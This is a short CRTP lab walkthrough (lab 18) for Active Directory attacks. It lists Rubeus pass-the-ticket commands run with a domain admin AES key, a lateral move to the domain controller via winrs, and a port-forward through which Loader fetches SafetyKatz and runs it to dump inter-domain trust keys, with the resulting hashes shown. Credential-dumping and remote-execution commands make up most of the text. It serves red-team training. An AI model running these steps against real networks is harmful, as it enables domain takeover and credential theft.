CRTP Lab 18
Task
# Start a DA process
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
# Copy Loader to dcorp-dc
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
# Open dcorp-dc shell
winrs -r:dcorp-dc cmd
# Setup port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::trust /patch" "exit"
Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)
Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/11/2024 9:04:30 PM - CLEAR - 6c 5c 5a 6f 92 82 4f 17 79 cb de 1d a0 33 e0 38 e8 a9 53 09 41 00 a5 84 da e2 3a fa 16 a6 47 8c 16 ac 9d 55 56 f8 22 51 80 7a 97 42 6a 18 34 72 47 50 6b ed 98 9c 3c 61 6e 11 6f 68 21 05 a1 d3 a0 eb ab a3 31 69 ed 75 c0 3c 54 49 cc a3 9a ef 0d c9 aa b2 af b1 5a c9 e3 dc d6 58 6c 6d 6c 1f 07 c5 bb c1 a9 be 61 ed 53 e1 9c a1 b8 bd 65 4b 0a a4 34 e9 6d ae 0a e3 60 2f 52 c0 02 67 a0 c8 b6 88 16 20 a1 31 06 6f 49 26 fd 2c d0 48 c6 70 3e 7d 18 eb 19 e1 17 c2 3b 0f 6e 23 5c 12 09 ce 1a 1b 43 69 9c 3b c7 ab 82 16 24 be d9 58 0a b5 c3 cd 5f 18 c1 7c 0e 25 75 36 6d 8d 32 e0 ee 92 58 3d 7d a9 8a 1a 21 1a c5 58 cc 4a 68 c7 53 ff 39 70 e1 8d 2b e5 3f 1e 3d 62 2b 4a 39 17 14 19 e3 14 62 a5 f9 7d ec 18 6a be 0f d0 7c 58 c4 a0
* aes256_hmac bce498af44bfa1a1aacfe367a7e421aeac474d647e41cada56ba25855ae9966c
* aes128_hmac 2a2cd8447dea2f3a7ad2da6944a32f58
* rc4_hmac_nt 2aa6fd0eec0369f316217d65bb808e50
Last updated